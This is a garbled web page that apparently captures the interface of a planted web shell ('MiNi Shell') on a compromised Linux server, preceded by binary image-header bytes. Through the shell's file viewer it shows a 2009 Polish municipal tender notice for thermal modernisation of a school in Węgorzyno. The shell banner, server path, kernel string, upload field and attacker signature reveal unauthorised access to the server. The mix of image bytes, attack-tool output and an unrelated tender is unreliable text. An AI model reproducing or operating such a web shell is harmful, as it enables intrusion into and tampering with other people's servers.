JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/104725-N-2009.html

<p class="kh_header"><b>Łobez: Termomodernizacja budynku Szkoły Podstawowej w Węgorzynie</b><br>
<b>Numer ogłoszenia: 104725 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łobez , ul. Niepodległości 13, 73-150 Łobez, woj. zachodniopomorskie, tel. 091 3974001, faks 091 3974373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lobez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termomodernizacja budynku Szkoły Podstawowej w Węgorzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest termomodernizacja budynku Szkoły Podstawowej przy ul. Grunwaldzkiej 2 w Węgorzynie z podziałem na następujące zadania:
1.Zadanie nr 1 - ocieplenie ścian zewnętrznych, stropodachu budynku, wymiana stolarki okiennej i drzwiowej,
a)docieplenie ścian zew. o łącznej powierzchni 1.763,7m2 mokrą metodą lekką z zastosowaniem trwałych powłok akrylowych przy:
a.zastosowaniu płyt styropianowych o grubości 16cm dla powierzchni ścian nadziemnych - 1.465,5 m2;
b.zastosowaniu płyt styropianowych o grubości 14cm dla powierzchni ścian podziemnych 301,2 m2  
b)docieplenie stropodachu o łącznej powierzchni 1.008,9m2 w tym:
a.dla stropodachu nie wentylowanego o powierzchni 418,1m2 warstwami płyt styropianowych o grubości 20 cm;
b.dla stropodachu wentylowanego o powierzchni 1.424,9m2 granulatem z wełny mineralnej o grubości 28 cm,
c)wymianę okien w budynku o łącznej powierzchni 637,1m2,
d)osadzenie 195 szt. nawiewników podokiennych pod niektórymi oknami,

Zadanie nr 2 - remont i kompleksowa wymiana istniejącej instalacji CO wraz z włączeniem instalacji CO do przyłączy węzła cieplnego w kotłowni budynku Szkoły Podstawowej. 
a)zainstalowanie dwóch nowej generacji kotłów opalanych gazem o łącznej mocy cieplnej 200kW - każdego kotła po 100kW,
b)modernizację centralnego ogrzewania obejmującą:
a.hermetyzację,
b.płukanie chemiczne,
c.montaż zaworów termostatycznych grzejnikowych,
d.regulację hydrauliczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.20.00-1, 45.26.26.00-7, 45.40.00.00-1, 45.44.21.21-1, 45.32.10.00-3, 45.33.11.00-7, 39.71.52.10-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1)	Oferent przystępujący do przetargu jest obowiązany wnieść przed upływem terminu składania ofert wadium w wysokości 5.000 zł (słownie złotych: pięć tysięcy) dla każdego zadania osobno.
2)	Wadium może być wnoszone w następujących formach :
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami).
3)	Wadium wnoszone w pieniądzu należy wpłacać na konto depozytowe Urzędu Miejskiego w Łobzie, konto nr 13 9375 1038 2600 4835 2000 0020. Dokument przelewu należy opisać: Wadium - Termomodernizacja budynku Szkoły Podstawowej w Węgorzynie, z dopiskiem nr zadania, którego dotyczy. Kopię przelewu należy załączyć do oferty.
4)	W przypadku wnoszenia wadium w formie :
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych prze podmioty, których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.),
należy złożyć w ofercie kserokopię poświadczoną za zgodność z oryginałem, a oryginał dokumentu należy złożyć w kasie Urzędu  Miejskiego w Łobzie (I piętro).
Wykonawca otrzyma pokwitowanie złożenia wadium. 
Poręczenia instytucji kredytowych i gwarancje ubezpieczeniowe obejmować winny czas związania Wykonawcy ofertą i wystawione według wzoru stanowiącego załącznik nr 6 do Specyfikacji. Gwarancja bankowa lub ubezpieczeniowa powinna zawierać ujęte we wzorze informacje.
5)	Wykonawca, którego oferta  nie będzie zabezpieczona jedną z w/w form wniesienia wadium zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego. Ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.
6)	Wadium wnoszone w pieniądzu uznane będzie za wniesione w terminie tylko
w przypadku wpłynięcia na konto Zamawiającego przed upływem terminu wyznaczonego na  złożenie wadium.
7)	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
8)	Zamawiający zwraca wadium na zasadach określonych w art. 46 ust. 1 ustawy Prawo zamówień publicznych (Dz. U.  2007 r. Nr 223, poz. 1655 z późn. zm.).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy:
1)spełniają  warunki zawarte w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 Prawo   zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), tj.:
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d)nie podlegają, wykluczeniu z postępowania o udzielenie zamówienia,
2)Za spełnienie warunków określonych w podpunkcie 1) Zamawiający uzna jeżeli:  
a)dysponują osobą z niezbędnymi uprawnieniami zgodnie z wymogami prawa budowlanego w zakresie objętym zamówieniem i należącymi do Okręgowej Izby  Inżynierów Budownictwa
i.dla zadania nr 1 do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej, która będzie pełniła funkcję kierownika budowy.
ii.dla zadania nr 2 do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacji, gazowych, wodociągowych i kanalizacyjnych, która będzie pełniła funkcję kierownika budowy,
b)wykażą i udokumentują (referencje, opinie lub listy polecające ) w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, wykonanie minimum jednej roboty budowlanej odpowiadającej swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Zamawiający również uzna za spełnienie tego warunku jeżeli oferent wykonał:
i.dla zadania nr 1 minimum dwie roboty budowlane polegające na ociepleniu budynku o wartości minimum 100.000 zł. każda 
ii.dla zadania nr 2 minimum dwie roboty budowlane polegające na remoncie, wymianie instalacji c.o.  o wartości minimum 50.000 zł. każda
c)legitymują się ubezpieczeniem od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej,
d)przedstawią informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy na kwotę min. 12 wartości zamówienia brutto
e)złożenie wraz z ofertą dokumentów i oświadczeń wskazanych w pkt 6 SIWZ.   
3)Ocena ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach dołączonych do oferty. Z treści załączonych dokumentów musi wynikać jednoznacznie, że w/w warunki Wykonawca spełnił. 
W przypadku wątpliwości co do treści oświadczeń i dokumentów złożonych przez Wykonawcę lub są zawierają błędy, a także w przypadku braku oświadczeń, dokumentów lub pełnomocnictw na potwierdzenie spełnienia warunków udziału w postępowaniu, Zamawiający wzywa Wykonawcę w określonym przez siebie terminie do złożenia wyjaśnień lub brakujących dokumentów, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Brak jakiegokolwiek dokumentu potwierdzającego spełnianie wymagań określonych w SIWZ spowoduje wykluczenie Wykonawcy z postępowania  o udzielenie zamówienia.     
4)Zamawiający, zgodnie z art. 89 ust.1 ustawy Prawo zamówień publicznych odrzuci ofertę, jeżeli:
a)jest niezgodna z ustawą,
b)jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, zastrzeżeniem art. 87 ust. 2 pkt 3 ustawy Pzp,
c)jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
d)zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia, 
e)została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia  lub nie zaproszonego do składania ofert,
f)zawiera błędy w obliczeniu ceny,
g)wykonawca w terminie 3 dni od dnia otrzymania zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp,
h)jest nieważna na podstawie odrębnych przepisów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku Wykonawców występujących wspólnie należy dołączyć aktualne akty rejestracji firmy dla każdego podmiotu
2)Zaświadczenie właściwego Naczelnika Urzędu Skarbowego  potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków i opłat, wystawione nie wcześniej niż
 3 miesiące przed upływem składania ofert, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
W przypadku Wykonawców występujących wspólnie należy dołączyć zaświadczenia dla każdego z podmiotów.
3)Zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega  z opłacaniem składek na ubezpieczenie zdrowotne lub społeczne, wystawione  nie  wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
W przypadku Wykonawców występujących wspólnie należy dołączyć zaświadczenia dla każdego z podmiotów. 
4)Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu
o zamówienie publiczne zgodnie z art. 22 ust. 1 ustawy, stanowiące załącznik nr 2 do  niniejszej specyfikacji.
W przypadku Wykonawców występujących wspólnie każdy  z   podmiotów.
5)Wykaz osób, które będą wykonywać zamówienie lub uczestniczyć w wykonywaniu zamówienia (kadra kierownicza) - na druku stanowiącym załącznik nr 3 do niniejszej specyfikacji,
6Dokumenty potwierdzające uprawnienia do kierowania robotami budowlanymi w specjalności instalacje w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych określonymi  przepisami  ustawy - Prawo budowlane oraz przynależnością do Okręgowej Izby Inżynierów Budownictwa lub Izby Architektów).
7)Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania (według załącznika nr 4 do niniejszej specyfikacji).
8)Dokumenty potwierdzające, że roboty zostały wykonane należycie (np. referencje, 
protokoły odbioru końcowego, rekomendacje).
9)Dokument wniesienia wadium.
10)Informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek, potwierdzający wysokość posiadanych środków finansowych lub zdolność kredytową  Wykonawcy na kwotę min. 2/10 wartości zamówienia brutto, wystawionej nie wcześniej niż 3 miesiące przed  upływem terminu  składania ofert
11)Polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
12)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, składa dokumenty zgodnie z § 2 ust. 1, 2 i 3  Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów  dokumentów, jakich możne żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  (Dz. U. z 2006r. Nr 87, poz. 605).
13)Inne dokumenty wymagane przez Zamawiającego:
13)Pełnomocnictwo - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej. Pełnomocnictwo musi być przedłożone w formie oryginału lub kopii potwierdzonej notarialnie 
14)W przypadku składania oferty przez wykonawców wspólnie (art. 23 ustawy Prawo zamówień publicznych) należy załączyć dokument o warunkach wspólnego    
zamiaru wykonania zamówienia, w szczególności zawierający informację o Pełnomocniku wykonawców do reprezentowania ich w postępowaniu o udzielenie 
zamówienia albo o reprezentowaniu ich w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.

Dokumenty (z wyłączeniem pełnomocnictwa) mogą być dostarczone w formie oryginałów lub kserokopii poświadczonej za zgodność z oryginałem przez osobę  osoby uprawnioną  do odpisania oferty z dopiskiem za zgodność z oryginałem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.lobez.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Łobzie ul. Niepodległości 13, 73-150 Łobez.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.07.2009 godzina 10:00, miejsce: Urząd Miejski w Łobzie ul. Niepodległości 13, 73-150 Łobez, I piętro pok. nr 24 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com